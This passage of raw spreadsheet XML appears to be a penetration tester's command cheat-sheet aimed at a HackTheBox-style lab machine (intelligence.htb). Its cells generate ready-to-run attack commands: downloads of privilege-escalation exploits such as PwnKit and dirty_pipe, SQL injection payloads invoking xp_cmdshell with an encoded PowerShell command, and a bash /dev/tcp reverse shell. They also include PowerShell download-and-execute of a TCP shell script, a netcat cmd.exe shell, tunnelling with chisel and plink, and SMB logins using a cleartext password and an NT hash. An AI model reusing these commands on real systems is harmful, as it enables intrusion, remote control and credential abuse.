        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B25</f>
        <v>wget 10.10.16.4/chisel</v>
      </c>
    </row>
    <row r="36" spans="2:7">
      <c r="B36" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B26</f>
        <v>wget 10.10.16.4/linpeas.sh</v>
      </c>
    </row>
    <row r="37" spans="2:7">
      <c r="B37" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B27</f>
        <v>wget 10.10.16.4/pspy64</v>
      </c>
    </row>
    <row r="38" spans="2:7">
      <c r="B38" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B28</f>
        <v>wget 10.10.16.4/busybox.sh</v>
      </c>
    </row>
    <row r="39" spans="2:7">
      <c r="B39" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B29</f>
        <v>wget 10.10.16.4/PwnKit</v>
      </c>
    </row>
    <row r="40" spans="2:7">
      <c r="B40" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B30</f>
        <v>wget 10.10.16.4/BaronSamedit.py</v>
      </c>
    </row>
    <row r="41" spans="2:7">
      <c r="B41" s="3" t="str">
        <f>"wget "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B31</f>
        <v>wget 10.10.16.4/dirty_pipe_2</v>
      </c>
      <c r="G41" s="2" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="43" spans="2:7">
      <c r="B43" s="4" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="44" spans="2:7">
      <c r="B44" s="3" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="45" spans="2:7">
      <c r="B45" s="3" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="47" spans="2:7">
      <c r="B47" s="4" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="48" spans="2:7">
      <c r="B48" s="3" t="str">
        <f>"time crackmapexec smb "&amp;$C$5&amp;" -u "&amp;$F$4&amp;" -p "&amp;$I$4&amp;" --shares -M spider_plus"</f>
        <v>time crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' --shares -M spider_plus</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="str">
        <f>"smbclient \\\\"&amp;$C$5&amp;"\\share -U "&amp;$F$4&amp;"%"&amp;$I$4</f>
        <v>smbclient \\\\10.10.10.248\\share -U Tiffany.Molina%'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="3" t="str">
        <f>"smbclient \\\\192.168.xx.xx\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b"</f>
        <v>smbclient \\\\192.168.xx.xx\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b</v>
      </c>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="3" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="3" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="3" t="s">
        <v>63</v>
      </c>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="4" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="3" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="3" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="4" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="60" spans="2:2">
      <c r="B60" s="3" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="3" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="62" spans="2:2">
      <c r="B62" s="3" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="3" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="65" spans="2:2">
      <c r="B65" s="4" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="66" spans="2:2">
      <c r="B66" s="3" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="67" spans="2:2">
      <c r="B67" s="3" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="68" spans="2:2">
      <c r="B68" s="3" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="69" spans="2:2">
      <c r="B69" s="3" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="70" spans="2:2">
      <c r="B70" s="3" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="71" spans="2:2">
      <c r="B71" s="3" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="73" spans="2:2">
      <c r="B73" s="4" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="74" spans="2:2">
      <c r="B74" s="3" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="76" spans="2:2">
      <c r="B76" s="4" t="s">
        <v>79</v>
      </c>
    </row>
    <row r="77" spans="2:2">
      <c r="B77" s="3" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="79" spans="2:2">
      <c r="B79" s="4" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="80" spans="2:2">
      <c r="B80" s="3" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="81" spans="2:3">
      <c r="B81" s="27"/>
    </row>
    <row r="82" spans="2:3">
      <c r="B82" s="4" t="s">
        <v>83</v>
      </c>
    </row>
    <row r="83" spans="2:3">
      <c r="B83" s="3" t="s">
        <v>84</v>
      </c>
      <c r="C83" s="29" t="s">
        <v>85</v>
      </c>
    </row>
    <row r="84" spans="2:3">
      <c r="B84" s="30" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="85" spans="2:3">
      <c r="B85" s="30" t="s">
        <v>87</v>
      </c>
    </row>
    <row r="86" spans="2:3">
      <c r="B86" s="3" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="87" spans="2:3">
      <c r="B87" s="3" t="s">
        <v>89</v>
      </c>
    </row>
    <row r="89" spans="2:3">
      <c r="B89" s="4" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="90" spans="2:3">
      <c r="B90" s="3" t="str">
        <f>"python3 dnstool.py -u '"&amp;$F$5&amp;"\"&amp;$F$4&amp;"' -p "&amp;$I$4&amp;" "&amp;$C$5&amp;" -a add -r web1 -d "&amp;$C$4&amp;" -t A"</f>
        <v>python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 -a add -r web1 -d 10.10.16.4 -t A</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="C83" r:id="rId1" xr:uid="{CC572A4E-8FD1-4656-AE93-0F2D4A499D5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9D5-8F20-4139-8EAC-9AAA2B0792D0}">
  <dimension ref="B4:O103"/>
  <sheetViews>
    <sheetView topLeftCell="H4" workbookViewId="0">
      <selection activeCell="H4" sqref="H4:I4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="18.75"/>
  <cols>
    <col min="2" max="2" width="36.625" style="3" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="6" spans="2:9" s="3" customFormat="1"/>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="6" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="6" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="10" spans="2:9">
      <c r="B10" s="6" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="11" spans="2:9">
      <c r="B11" s="6" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="6" t="str">
        <f>"';EXECUTE xp_cmdshell 'whoami' -- "</f>
        <v xml:space="preserve">';EXECUTE xp_cmdshell 'whoami' -- </v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="6" t="str">
        <f>"';EXECUTE xp_cmdshell 'curl "&amp;'1. Reconnaissance'!$C$4&amp;"' -- "</f>
        <v xml:space="preserve">';EXECUTE xp_cmdshell 'curl 10.10.16.4' -- </v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="6" t="str">
        <f>"';EXECUTE xp_cmdshell 'ping "&amp;'1. Reconnaissance'!$C$4&amp;"' -- "</f>
        <v xml:space="preserve">';EXECUTE xp_cmdshell 'ping 10.10.16.4' -- </v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="6" t="str">
        <f>"';EXECUTE xp_cmdshell 'powershell -nop -w hidden -e SQBFYg...' -- "</f>
        <v xml:space="preserve">';EXECUTE xp_cmdshell 'powershell -nop -w hidden -e SQBFYg...' -- </v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="6" t="str">
        <f>"' or 1=1 in (select @@version) -- //"</f>
        <v>' or 1=1 in (select @@version) -- //</v>
      </c>
    </row>
    <row r="17" spans="2:6">
      <c r="B17" s="7" t="str">
        <f>"' or 1=1 in (SELECT password FROM users) -- //"</f>
        <v>' or 1=1 in (SELECT password FROM users) -- //</v>
      </c>
    </row>
    <row r="18" spans="2:6">
      <c r="B18" s="7"/>
    </row>
    <row r="19" spans="2:6">
      <c r="B19" s="4" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="20" spans="2:6">
      <c r="B20" s="3" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="22" spans="2:6">
      <c r="B22" s="22" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="23" spans="2:6">
      <c r="B23" s="7" t="str">
        <f>"' ORDER BY 10-- //"</f>
        <v>' ORDER BY 10-- //</v>
      </c>
    </row>
    <row r="24" spans="2:6">
      <c r="B24" s="7" t="str">
        <f>"' UNION SELECT null,null,null,null,user(),null-- //"</f>
        <v>' UNION SELECT null,null,null,null,user(),null-- //</v>
      </c>
    </row>
    <row r="25" spans="2:6">
      <c r="B25" s="7" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="26" spans="2:6">
      <c r="B26" s="7" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="27" spans="2:6">
      <c r="B27" s="7" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="28" spans="2:6">
      <c r="B28" s="7" t="str">
        <f>"' or 1=1 in (SELECT password FROM users) -- //"</f>
        <v>' or 1=1 in (SELECT password FROM users) -- //</v>
      </c>
    </row>
    <row r="30" spans="2:6">
      <c r="B30" s="4" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="31" spans="2:6">
      <c r="B31" s="3" t="s">
        <v>102</v>
      </c>
      <c r="F31" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="32" spans="2:6">
      <c r="B32" s="3" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="33" spans="2:2">
      <c r="B33" s="3" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="34" spans="2:2">
      <c r="B34" s="3" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="35" spans="2:2">
      <c r="B35" s="3" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="36" spans="2:2">
      <c r="B36" s="3" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="38" spans="2:2">
      <c r="B38" s="4" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="39" spans="2:2">
      <c r="B39" s="3" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="40" spans="2:2">
      <c r="B40" s="3" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="41" spans="2:2">
      <c r="B41" s="3" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="42" spans="2:2">
      <c r="B42" s="3" t="s">
        <v>113</v>
      </c>
    </row>
    <row r="43" spans="2:2">
      <c r="B43" s="3" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="45" spans="2:2">
      <c r="B45" s="4" t="s">
        <v>115</v>
      </c>
    </row>
    <row r="46" spans="2:2">
      <c r="B46" s="3" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="48" spans="2:2">
      <c r="B48" s="4" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="3" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="3" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="4" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="3" t="str">
        <f>"wget "&amp;C4&amp;"/busybox.sh -O /tmp/busybox.sh ;bash /tmp/busybox.sh"</f>
        <v>wget 10.10.16.4/busybox.sh -O /tmp/busybox.sh ;bash /tmp/busybox.sh</v>
      </c>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="3" t="str">
        <f>"wget "&amp;C5&amp;"/busybox.sh -O /tmp/busybox.sh ;chmod 755 /tmp/busybox.sh ;/tmp/busybox.sh"</f>
        <v>wget 10.10.10.248/busybox.sh -O /tmp/busybox.sh ;chmod 755 /tmp/busybox.sh ;/tmp/busybox.sh</v>
      </c>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="3" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="3" t="str">
        <f>"bash -c ""bash -i &gt;&amp; /dev/tcp/"&amp;$C$4&amp;"/443 0&gt;&amp;1"""</f>
        <v>bash -c "bash -i &gt;&amp; /dev/tcp/10.10.16.4/443 0&gt;&amp;1"</v>
      </c>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="4" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="60" spans="2:2">
      <c r="B60" s="26" t="s">
        <v>124</v>
      </c>
    </row>
    <row r="62" spans="2:2">
      <c r="B62" s="4" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="3" t="str">
        <f>"powershell -Command ""Invoke-WebRequest -Uri "&amp;$C$4&amp;"/original/reverse_shell.exe -OutFile reverse_shell.exe"""</f>
        <v>powershell -Command "Invoke-WebRequest -Uri 10.10.16.4/original/reverse_shell.exe -OutFile reverse_shell.exe"</v>
      </c>
    </row>
    <row r="64" spans="2:2">
      <c r="B64" s="3" t="str">
        <f>"powershell -Command ""Invoke-WebRequest -Uri "&amp;$C$4&amp;"/original/reverse_shell.exe -OutFile reverse_shell.exe ;./reverse_shell.exe"</f>
        <v>powershell -Command "Invoke-WebRequest -Uri 10.10.16.4/original/reverse_shell.exe -OutFile reverse_shell.exe ;./reverse_shell.exe</v>
      </c>
    </row>
    <row r="65" spans="2:15" s="3" customFormat="1">
      <c r="B65" s="3" t="s">
        <v>126</v>
      </c>
    </row>
    <row r="66" spans="2:15">
      <c r="B66" s="3" t="str">
        <f>"powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://"&amp;$C$4&amp;"/Invoke-PowerShellTcp.ps1')"</f>
        <v>powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.4/Invoke-PowerShellTcp.ps1')</v>
      </c>
    </row>
    <row r="67" spans="2:15">
      <c r="B67" s="3" t="str">
        <f>"powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://"&amp;$C$4&amp;"/PowerUp.ps1')"</f>
        <v>powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.4/PowerUp.ps1')</v>
      </c>
    </row>
    <row r="68" spans="2:15">
      <c r="B68" s="3" t="str">
        <f>"nc64.exe -t -e C:\Windows\System32\cmd.exe "&amp;$C$4&amp;" 443"</f>
        <v>nc64.exe -t -e C:\Windows\System32\cmd.exe 10.10.16.4 443</v>
      </c>
    </row>
    <row r="70" spans="2:15">
      <c r="B70" s="4" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="71" spans="2:15">
      <c r="B71" s="3" t="s">
        <v>128</v>
      </c>
    </row>
    <row r="73" spans="2:15">
      <c r="B73" s="4" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" spans="2:15" ht="18.75" customHeight="1">
      <c r="B74" s="35" t="s">
        <v>130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</row>
    <row r="75" spans="2:15" ht="13.5" customHeight="1"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</row>
    <row r="76" spans="2:15" ht="18.75" customHeight="1"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2:15" ht="18.75" customHeight="1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2:15" ht="18.75" customHeight="1"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2:15" ht="36.75">
      <c r="B79" s="27" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="81" spans="2:15">
      <c r="B81" s="4" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="82" spans="2:15" ht="18.75" customHeight="1">
      <c r="B82" s="36" t="s">
        <v>133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</row>
    <row r="83" spans="2:15" ht="18.75" customHeight="1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</row>
    <row r="84" spans="2:15" ht="18.75" customHeight="1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</row>
    <row r="85" spans="2:15" ht="18.75" customHeight="1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</row>
    <row r="88" spans="2:15">
      <c r="B88" s="28" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="89" spans="2:15">
      <c r="B89" s="3" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="91" spans="2:15">
      <c r="B91" s="4" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="92" spans="2:15">
      <c r="B92" s="3" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="93" spans="2:15">
      <c r="B93" s="3" t="s">
        <v>138</v>
      </c>
    </row>
    <row r="94" spans="2:15">
      <c r="B94" s="3" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="96" spans="2:15">
      <c r="B96" s="4" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="97" spans="2:2">
      <c r="B97" s="3" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="3" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="4" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="101" spans="2:2">
      <c r="B101" s="3" t="str">
        <f>"rpcclient -U username%Password123! "&amp;$C$5</f>
        <v>rpcclient -U username%Password123! 10.10.10.248</v>
      </c>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="3" t="s">
        <v>144</v>
      </c>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="3" t="s">
        <v>145</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B74:O78"/>
    <mergeCell ref="B82:O8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7E4E-FCFB-46D4-A345-87054DA91962}">
  <dimension ref="B2:L69"/>
  <sheetViews>
    <sheetView topLeftCell="A29" workbookViewId="0">
      <selection activeCell="B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="36.625" style="16" bestFit="1" customWidth="1"/>
    <col min="3" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:9">
      <c r="B2" s="16" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="2:9">
      <c r="B4" s="16" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="6" spans="2:9">
      <c r="B6" s="3"/>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="17" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="16" t="str">
        <f>"ssh -L 1234:localhost:8000 "&amp;$F$4&amp;"@"&amp;$C$5</f>
        <v>ssh -L 1234:localhost:8000 Tiffany.Molina@10.10.10.248</v>
      </c>
      <c r="E8" s="3" t="str">
        <f>"★kaliのzshに打ち込む。kaliのlocalhost:1234→target("&amp;$C$5&amp;")のlocalhost:8000に飛ぶ。"</f>
        <v>★kaliのzshに打ち込む。kaliのlocalhost:1234→target(10.10.10.248)のlocalhost:8000に飛ぶ。</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3"/>
    </row>
    <row r="10" spans="2:9">
      <c r="B10" s="17" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="11" spans="2:9">
      <c r="B11" s="16" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="16" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="16" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="16" t="str">
        <f>"./ligolo_agent.exe -connect "&amp;C4&amp;":11601 -ignore-cert"</f>
        <v>./ligolo_agent.exe -connect 10.10.16.4:11601 -ignore-cert</v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="16" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="16" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="16" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="16" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="9">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="16" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="16" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="16" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="16" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="16" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="16" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="16" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="17" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="16" t="str">
        <f>'101. ExploitTools'!B25&amp;" server --port 8888 --reverse"</f>
        <v>chisel server --port 8888 --reverse</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="16" t="str">
        <f>"./chisel client "&amp;$C$4&amp;":8888 R:socks &gt; /dev/null 2&gt;&amp;1 &amp;"</f>
        <v>./chisel client 10.10.16.4:8888 R:socks &gt; /dev/null 2&gt;&amp;1 &amp;</v>
      </c>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="16" t="str">
        <f>"./chisel client "&amp;$C$4&amp;":8888 R:8081:127.0.0.1:8000"</f>
        <v>./chisel client 10.10.16.4:8888 R:8081:127.0.0.1:8000</v>
      </c>
    </row>
    <row r="33" spans="2:12">
      <c r="B33" s="16" t="str">
        <f>".\"&amp;'101. ExploitTools'!B10&amp;" client "&amp;$C$4&amp;":8888 R:socks"</f>
        <v>.\chisel.exe client 10.10.16.4:8888 R:socks</v>
      </c>
    </row>
    <row r="34" spans="2:12">
      <c r="B34" s="18" t="str">
        <f>".\chisel.exe client "&amp;'1. Reconnaissance'!C4&amp;":8888 R:80:172.16.82.241:80"</f>
        <v>.\chisel.exe client 10.10.16.4:8888 R:80:172.16.82.241:80</v>
      </c>
      <c r="L34" s="4"/>
    </row>
    <row r="35" spans="2:12">
      <c r="B35" s="18"/>
      <c r="L35" s="4"/>
    </row>
    <row r="36" spans="2:12">
      <c r="B36" s="17" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="37" spans="2:12">
      <c r="B37" s="16" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="38" spans="2:12">
      <c r="B38" s="16" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="41" spans="2:12">
      <c r="B41" s="17" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="42" spans="2:12">
      <c r="B42" s="16" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="43" spans="2:12">
      <c r="B43" s="16" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="44" spans="2:12">
      <c r="B44" s="3" t="str">
        <f>"Start-Process -FilePath ""powershell"" -argumentlist ""IEX(New-Object Net.webClient).downloadString('http://"&amp;$C$4&amp;"/Invoke-PowerShellTcp.ps1')"" -Credential $creds"</f>
        <v>Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.16.4/Invoke-PowerShellTcp.ps1')" -Credential $creds</v>
      </c>
    </row>
    <row r="46" spans="2:12">
      <c r="B46" s="17" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="47" spans="2:12">
      <c r="B47" s="16" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="48" spans="2:12">
      <c r="B48" s="16" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="16" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="16" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="51" spans="2:2">
      <c r="B51" s="18" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="52" spans="2:2">
      <c r="B52" s="16" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="53" spans="2:2">
      <c r="B53" s="16" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="54" spans="2:2">
      <c r="B54" s="18" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="55" spans="2:2">
      <c r="B55" s="18" t="str">
        <f>"C:\Windows\Temp\plink.exe -ssh -l kali -pw kali -R 127.0.0.1:9833:127.0.0.1:3389 "&amp;$C$4</f>
        <v>C:\Windows\Temp\plink.exe -ssh -l kali -pw kali -R 127.0.0.1:9833:127.0.0.1:3389 10.10.16.4</v>
      </c>
    </row>
    <row r="56" spans="2:2">
      <c r="B56" s="18" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="57" spans="2:2">
      <c r="B57" s="18" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="58" spans="2:2">
      <c r="B58" s="18" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="59" spans="2:2">
      <c r="B59" s="18" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="61" spans="2:2">
      <c r="B61" s="17" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="62" spans="2:2" ht="19.5">
      <c r="B62" s="19" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="16" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="64" spans="2:2">
      <c r="B64" s="20" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="65" spans="2:2">
      <c r="B65" s="16" t="str">
        <f>"wget "&amp;$C$4&amp;"/original/authorized_keys"</f>
        <v>wget 10.10.16.4/original/authorized_keys</v>
      </c>
    </row>
    <row r="66" spans="2:2">
      <c r="B66" s="16" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="68" spans="2:2">
      <c r="B68" s="4" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="69" spans="2:2">
      <c r="B69" s="16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93B3-FC21-43E2-86DC-43D5DFA92D9F}">
  <dimension ref="B2:I168"/>
  <sheetViews>
    <sheetView topLeftCell="A74" workbookViewId="0">
      <selection activeCell="B99" sqref="B99"/>
    </sheetView>
  </sheetViews>
